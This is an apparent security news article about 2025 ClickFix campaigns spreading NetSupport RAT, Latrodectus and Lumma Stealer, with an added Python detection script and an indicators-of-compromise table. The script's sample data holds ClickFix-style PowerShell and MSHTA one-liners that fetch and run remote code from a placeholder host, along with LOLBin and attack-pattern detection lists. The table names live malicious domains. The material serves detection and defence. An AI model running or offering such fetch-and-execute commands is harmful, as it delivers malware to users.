A wave of attacks built on the “ClickFix” social engineering technique is giving threat actors a reliable route into organizations across many sectors.
Throughout 2025, security researchers have observed an uptick in high-profile campaigns distributing NetSupport RAT, Latrodectus malware, and Lumma Stealer, all utilizing variants of ClickFix to gain initial access and establish persistence within enterprise environments.
ClickFix Technique Empowers Threat Actors
ClickFix is a deceptive social engineering method that exploits users’ trust in “quick fix” solutions for common computer problems.
Under the guise of fixing mundane issues such as missing drivers, failed document previews or pop-up errors, threat actors instruct users to copy a command and execute it in the Windows Run dialog (Win+R) or in a PowerShell or Terminal window opened from the Win+X menu.
The command is usually placed in the user’s clipboard by malicious JavaScript on compromised websites, malvertising landing pages, fake tech support forums, or seemingly legitimate video tutorials, a technique also dubbed “pastejacking.”
The superficial credibility of these lures is reinforced by impersonating trusted brands such as DocuSign and Okta, further obscuring the malicious intent and making detection more challenging for both users and security systems.

Researchers have documented how these attacks sidestep traditional security controls: there is no exploit, no malicious attachment and no phishing link to detonate or block.
Instead, the user is socially engineered into manually executing the attacker’s payload through trusted system interfaces.
This complicates automated detection, but it also leaves distinctive forensic traces: the typed command persists under the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, and the resulting PowerShell or MSHTA process is spawned as a child of explorer.exe (or of the console opened via Win+X) immediately after the clipboard paste.
Full Control of Targeted Organizations
Several major malware families have integrated ClickFix into their delivery chains in 2025.
A NetSupport RAT campaign in May targeted sectors ranging from healthcare and legal services to telecommunications and mining, leveraging fake DocuSign and Okta pages to trick users into running obfuscated PowerShell commands.

These scripts typically download malicious loaders and RAT payloads, often masquerading as legitimate runtime dependencies.
Latrodectus operators have also evolved, using compromised websites and ClearFake infrastructure to inject PowerShell commands that ultimately deploy the malware through side-loaded DLLs.
Meanwhile, Lumma Stealer campaigns have expanded into IT, automotive, and energy sectors, employing unique MSHTA commands tied to individually tracked payloads, and using typosquatted domains that mimic legitimate IP logging services.
The observed impact of ClickFix campaigns ranges from initial access and credential theft to mail exfiltration, endpoint takeover and, in some cases, ransomware deployment.
Sectors affected include high technology, financial services, manufacturing, retail, government, and utilities.
Incident response teams, such as Palo Alto Networks’ Unit 42, report a notable rise in compromises initiated through ClickFix lures, underscoring the need for proactive defense.
Detection and mitigation rest on a combination of user awareness, endpoint monitoring, and forensic analysis.
Analysts are encouraged to monitor Windows process creation events for PowerShell, MSHTA and other living-off-the-land binaries launched from explorer.exe, to scrutinize RunMRU registry artifacts for obfuscated or encoded commands, and to correlate the browsing session that delivered the lure with the PowerShell or MSHTA execution that followed it.
Security solutions such as Advanced WildFire, Advanced URL Filtering, DNS Security, and endpoint detection and response platforms like Cortex XDR offer layered defenses, while ongoing user education remains critical in reducing the success of these social engineering attacks.
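The following Python is an added example, not code from the article or from Unit 42, showing the two checks described above: it parses a RunMRU export (entries in MRUList order, Explorer's trailing "\1" stripped), decodes any -EncodedCommand payload, scores each Run-dialog command for ClickFix traits, and then pairs flagged entries with explorer.exe child processes whose command line matches what was typed. The registry export, the Sysmon-style process records, the example.invalid URLs and the encoded payload are all constructed for the example; the pairing step assumes the logged CommandLine keeps the arguments as the user typed them.

```python
import base64
import re

# CONSTRUCTED export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Explorer stores each Run-dialog entry under a single-letter value ending in "\1";
# MRUList orders the letters, most recent first.
_ENCODED = base64.b64encode(
    "iex (irm http://example.invalid/verify)".encode("utf-16le")).decode()
SAMPLE_RUNMRU = {
    "MRUList": "cbda",
    "a": "notepad\\1",
    "b": f"powershell -w hidden -nop -ep bypass -enc {_ENCODED}\\1",
    "c": "mshta http://example.invalid/check\\1",
    "d": "cmd /c ipconfig\\1",
}

# CONSTRUCTED Sysmon Event ID 1 style records (Sysmon field names).
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                    f"-w hidden -nop -ep bypass -enc {_ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": '"C:\\Windows\\System32\\mshta.exe" http://example.invalid/check'},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

LOLBINS = {"powershell", "pwsh", "mshta", "cmd", "wscript", "cscript", "rundll32",
           "regsvr32", "certutil", "bitsadmin", "curl", "msiexec"}

# Argument patterns common in ClickFix one-liners; each match adds a reason.
SUSPICIOUS = {
    r"-(?:e|ec|en|enc|encodedcommand)\b": "encoded command",
    r"-w(?:indowstyle)?\s+h(?:idden)?\b": "hidden window",
    r"-(?:ep|executionpolicy)\s+bypass\b": "execution policy bypass",
    r"\biex\b|invoke-expression": "Invoke-Expression",
    r"\birm\b|\biwr\b|invoke-(?:web|rest)\w+|download(?:string|file)": "remote download",
    r"https?://": "URL in command",
}

def parse_runmru(export):
    """Run-dialog entries in MRU order, with Explorer's trailing '\\1' removed."""
    entries = []
    for slot in export.get("MRUList", ""):
        raw = export.get(slot)
        if raw is not None:
            cmd = raw[:-2] if raw.endswith("\\1") else raw
            entries.append({"slot": slot, "command": cmd})
    return entries

def decode_encoded_command(command):
    """Decode the base64 UTF-16LE argument of -enc/-EncodedCommand, or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def _split(command):
    """(executable basename without .exe, normalised argument tail) of a command line."""
    c = command.strip()
    if not c:
        return "", ""
    parts = c[1:].split('"', 1) if c.startswith('"') else c.split(None, 1)
    exe = parts[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    return exe, (" ".join(parts[1].lower().split()) if len(parts) > 1 else "")

def triage_runmru(export):
    """Flag Run-dialog entries that launch a LOLBin with ClickFix-style arguments."""
    findings = []
    for entry in parse_runmru(export):
        exe, _ = _split(entry["command"])
        if exe not in LOLBINS:
            continue
        decoded = decode_encoded_command(entry["command"])
        haystack = entry["command"] + ("\n" + decoded if decoded else "")
        reasons = [why for pat, why in SUSPICIOUS.items() if re.search(pat, haystack, re.I)]
        if exe == "mshta":
            reasons.append("MSHTA launcher")
        if reasons:
            findings.append({**entry, "exe": exe, "decoded": decoded, "reasons": reasons})
    return findings

def correlate_process_events(export, events):
    """Pair flagged entries with explorer.exe children whose executable and argument
    tail match the typed command (assumes CommandLine keeps the arguments as typed)."""
    flagged = {(f["exe"], _split(f["command"])[1]): f for f in triage_runmru(export)}
    hits = []
    for ev in events:
        if _split(ev["ParentImage"])[0] != "explorer":
            continue
        f = flagged.get((_split(ev["Image"])[0], _split(ev["CommandLine"])[1]))
        if f:
            hits.append({"slot": f["slot"], "image": ev["Image"], "reasons": f["reasons"]})
    return hits
```

Run against the constructed sample, `triage_runmru` flags slots c (MSHTA with a URL) and b (hidden, policy-bypassed, encoded PowerShell whose decoded body pulls and evaluates a remote script) while leaving notepad and the plain `cmd /c ipconfig` alone, and `correlate_process_events` ties both to their explorer.exe-spawned processes. On a live host the export would come from the user's NTUSER.DAT hive and the events from Sysmon or Security event 4688; the patterns are a starting heuristic, not an exhaustive signature.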
As the ClickFix phenomenon continues to proliferate and adapt, organizations must remain vigilant, combining technical controls with robust incident response and cyber hygiene practices to mitigate the risk of these highly effective social engineering campaigns.
Indicators of Compromise (IOCs)
| Threat | File Name | SHA256 Hash | Domains/IPs |
|---|---|---|---|
| Lumma Stealer | PartyContinued.exe | 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef | iplogger[.]co, stuffgull[.]top, sumeriavgv[.]digital, pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev, pub-626890a630d8418ea6c2ef0fa17f02ef.r2[.]dev, pub-a5a2932dc7f143499b865f8580102688.r2[.]dev, agroeconb[.]live, animatcxju[.]live |
| Latrodectus | libecf.dll | 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1 | webbs[.]live, diab[.]live, mhbr[.]live, decr[.]live, lexip[.]live, rimz[.]live, byjs[.]live, btco[.]live, izan[.]live, k.veuwb[.]live, r.netluc[.]live, heyues[.]live, k.mailam[.]live |
| NetSupport RAT | msvcp140.dll | cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527 | oktacheck.it[.]com, doccsign.it[.]com, docusign.sa[.]com, dosign.it[.]com, loyalcompany[.]net, leocompany[.]org, mhousecreative[.]com, mh-sns[.]com, lasix20[.]com |